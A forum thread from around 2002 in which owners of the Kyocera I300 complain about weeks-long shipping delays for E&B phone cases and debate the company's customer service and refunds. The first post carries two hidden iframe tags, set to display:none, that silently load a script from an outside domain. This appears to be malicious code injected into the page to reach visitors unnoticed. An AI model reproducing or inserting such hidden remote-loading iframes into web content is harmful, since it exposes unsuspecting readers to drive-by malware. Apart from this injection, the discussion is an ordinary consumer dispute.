+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Angry E&B Cases problem

Is anyone else having problems getting the E&B case? I paid them for a case for my I300 as well as overnight shipping over 23 days ago and it still hasn't even been shipped out yet. i think this is ridiculous.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You should find more info on the E&B cases in other threads being discussed.

I do agree though. That makes absolutely no sense. I'd look at getting my overnight fee refunded at the very least. Have you had any correspondance with them regarding the concern. Is contact initiated by you or them?

Angry

i have emailed them after 5 days after 10 days as well as 15 days. they tell me that they have received small shipments of the cases at a time and that the orders are filled on a first come first serve basis. but cmon 0ver 20 days. your right, i wll tell them to at least reimburse me for my shipping.

Over a month

I ordered mine on Dec 15th and received mine Jan 18th. It took a full 30 days before they even shipped mine.

I was pretty upset also. Luckily I hadn't paid for overnight shipping.

Administrator

Arrow

seems the best route is to physically call them and make sure they have some IN STOCK at that moment... i dont like anyone messing with my money...

Question E&B Case Location

Gents,

I'm migrating from Kyocera's QCP 6035 and would like to find a great case.

Although it sounds like a nightmare taking delivery... is it great?

Where can I find more information or location to order?

Administrator

Arrow

bifster,

please do a search. there are 2 threads on this case and others... if you type in "case" for a search, you will get some answers...

Late Night, My Bad

Sorry... I found it. Thanks.

Angry Still Nothing

I called today and vented my fustration to Sam the Customer Service Rep. he was very polite, but giving me the same lame excuse. small shipment, not enough, 1st come, 1st serve, blah blah blah. i told him that i was extremely dissapointed in the company and that i wanted to cancel my order. i also told him that i was planning on letting all other I300 owners about this problem on this website, and he then patched me to his supervisors voice mail. I believe his name was Mike, needless to say he has yet to call me,
    I also don't think that my cancellation even happened yet. Now i am really confused to what i should do.

Exactly what you're doing friend. They can't afford for you to badmouth them here. This is their key market for this case.

Mike is the CEO. He will take care of you if he can. I worked with Mike a decent amount in developing the case and he is a very fair guy and will listen to what you have to say with an open mind. However, if what the rep says is true, there isn't much Mike can do for you. He has to fill the orders out on a first-come, first-serve basis. Others have received their cases so they are shipping. I know you've waited a long time for this case but if you can just hold on a little bit longer, the wait will be worth it.

I agree with the policy and sticking to it, but would have a hard time smiling when Next Day Air was offered to me a month ago,
    I'm sure the folks over there would have preferred for the wait to have not been so long. Why have they neglected to call and email their customers with updates though. Seems to me they'd be offering free shipping and 10% off next purchase. This was a huge blunder.

E&B is a very small company and I'm sure if they could offer that to all their customers, they would. While that may not be what everyone wants to hear and may indeed end up costing them customers in the long run, that's unfortunately the reality of the situation. Fact of the matter is, I couldn't even get them to give me overnight shipping on my free case, said they just couldn't afford it. With the decline in PDA sales, it not only has affected Palm and Handspring, but I'm sure E&B has felt the squeeze as well. I guess I'm more tolerant of them becasue I did get a free case but also because I've been through it with them before. I requested a case for my Prism+Minstrel modem and a month later, they informed me one would be coming. A month and a half after placing my order the first day it was available, I got my case. All I can say is that the process does take some time and if you didn't order the case the day it was made available for ordering, you're probably going to have to wait some time. I'm sure you can probably negotiate free shipping, a credit, or a discount on your next purchase on an individual basis if you go about it in the right way but as far as them coming right out and offering that to everyone who hasn't reeceived their case, I just don't think they can financially afford to do it right now.

Administrator

Arrow

to lessen the heartache, dont buy from them until you see "In stock" on the item or after you have spoken to them directly, they inform you they do have some ready to be shipped out to anyone, not just the ones on the backorder status... patience my friends...

Angry E&B Case dilemma

I agree with what you are saying, but lets face it, it didn't even take this long for me to refinance my house. I think that this is an indication that no mater how small or big this company is, that they have maxed out in there business (growth) capacity and they have no willingness and have no idea how to meet consumer demand. the basic business rule. give your customer what they want and as fast as they want it and make him or her want to come back again in the future.

UPDATE: Mike has yet to call me?
    My order seems to still be live!

See, thats just outrageous that you havn't even received a call back yet. So now, not only is E&B not taking the initiative to contact their customers and update them on the status of their order, they have now deemed it unnecessary to return calls.

Marty, I understand your loyalty to the company, and also agree that we need to have patience, but come on. Do you draw a line?

Mike is the CEO. He will take care of you if he can. I worked with Mike a decent amount in developing the case and he is a very fair guy and will listen to what you have to say with an open mind.
    Njvic called how long ago to speak with Mike? That is bad business.

A month and a half after placing my order the first day it was available, I got my case. All I can say is that the process does take some time and if you didn't order the case the day it was made available for ordering, you're probably going to have to wait some time.
    Marty, this comment does not strengthen your argument for E&B. Not only do they not call customers to give them updates, call them back once the customers have called, they have a track record of doing such and have never felt the need to correct the problem. They're shooting themselves in the foot.

I am waiting for anyone to reply and tell me this is anything but bad business.
    Last edited by mjorange; 01-26-2002 at 12:12 PM.

It's my understanding -- correct me if I'm wrong -- but the deal that the credit card companies have with retailers is that they can't charge your account for a purchase until it is shipped. Now in some cases, such as a special order, they may charge up front, but I'm pretty sure these slipper cases aren't custom order items. You can always go back to the credit card company and dispute the payment since they billed you but didn't ship. Of course, you would never get the little bugger. I placed my order last week, and I assume my card was charged though I haven't seen the bill yet. But if I do get my credit card bill and the charge is on it but I don't yet have the case, I will dispute paying for it until it arrives or E & B can prove that it was shipped.
    Still in all, a pretty dumb way to run a company.

I do agree that Mike should have given a call back but honestly, I don't expect him to, at least not for a while. He is the CEO and is extemely busy. Yes, that's a lame excuse but when you leave a message for a CEO to call you back, you have to be realistic. I have something that I'm still waiting to hear back from him on. Its been a week and I haven't heard anything from him. If I can't get a reply from him, I wouldn't expect njvikesfan to either. Your best bet would be to email him. He's pretty good about responding to email but is often on the road. Truthfully, other than not returning a phone call, I don't think E&B has done anything wrong here. The case was on backorder when ordered and the first shipment had yet to be produced, that was no secret (so a long wait should have been expected). They are now shipping what they have and are doing it on a first-come, first-serve basis. I'm sure they are producing as many of the cases as quickly as their resources will allow them to do and will send you an email the moment a case becomes available to ship to you. Until then, you know the case is on backorder. To me, this is just the risk you take when you order an item that has yet to be produced, especially one made by a small company with limited resources. Sorry, don't mean to sound cold but if you can just hang on for a little while longer, you will get your case and it will be worth the wait.

Originally posted by Gruss
    It's my understanding -- correct me if I'm wrong -- but the deal that the credit card companies have with retailers is that they can't charge your account for a purchase until it is shipped. Now in some cases, such as a special order, they may charge up front, but I'm pretty sure these slipper cases aren't custom order items. You can always go back to the credit card company and dispute the payment since they billed you but didn't ship. Of course, you would never get the little bugger. I placed my order last week, and I assume my card was charged though I haven't seen the bill yet. But if I do get my credit card bill and the charge is on it but I don't yet have the case, I will dispute paying for it until it arrives or E & B can prove that it was shipped.
    Still in all, a pretty dumb way to run a company.
    I don't know how E&B is doing it now, but when I ordered a slipper case for another device a few months ago, they didn't charge my credit card until the case shipped and the order confirmation page I got after placing the order specifically said that.

Thumbs down

I do agree that Mike should have given a call back but honestly, I don't expect him to, at least not for a while. He is the CEO and is extemely busy.
    How busy is he if he can't afford to overnight your case to you after you overnighted it to him?
    Truthfully, other than not returning a phone call, I don't think E&B has done anything wrong here. The case was on backorder when ordered and the first shipment had yet to be produced, that was no secret (so a long wait should have been expected). They are now shipping what they have
    I'll tell you what they did wrong. You don't sell what you don't have, Marty. I don't see why it is so difficult for you to see that this is bad business. I don't care about Mike. The CEO who is so busy that he can't return calls and also can't afford $9 to overnight your phone. There needs to be someone for N to speak with about his problem and if the busy CEO who doesn't have time is the designated person, then that's bad business. Sprint made the mistake of selling me an I300 over the summer. I found out that it was backordered and would be shipped first come first served. I got my money back and bought elsewhere. You would have done the same.
    Your loyalty is commendable, yet your logic is foggy and ungrounded.
    A long wait should have been expected? Who do you think E&B is? What is so good about their products. Its a cell phone case. You act like they're giving them away.
    To me, this is just the risk you take when you order an item that has yet to be produced, especially one made by a small company with limited resources.
    ...and thats exactly why I haven't and won't from them.
    A small company with limited resources realizes that every client is their only client. Mass emails updates. Calls people back. Doesn't get into debt.

Wake up.
    Last edited by mjorange; 01-26-2002 at 01:47 PM.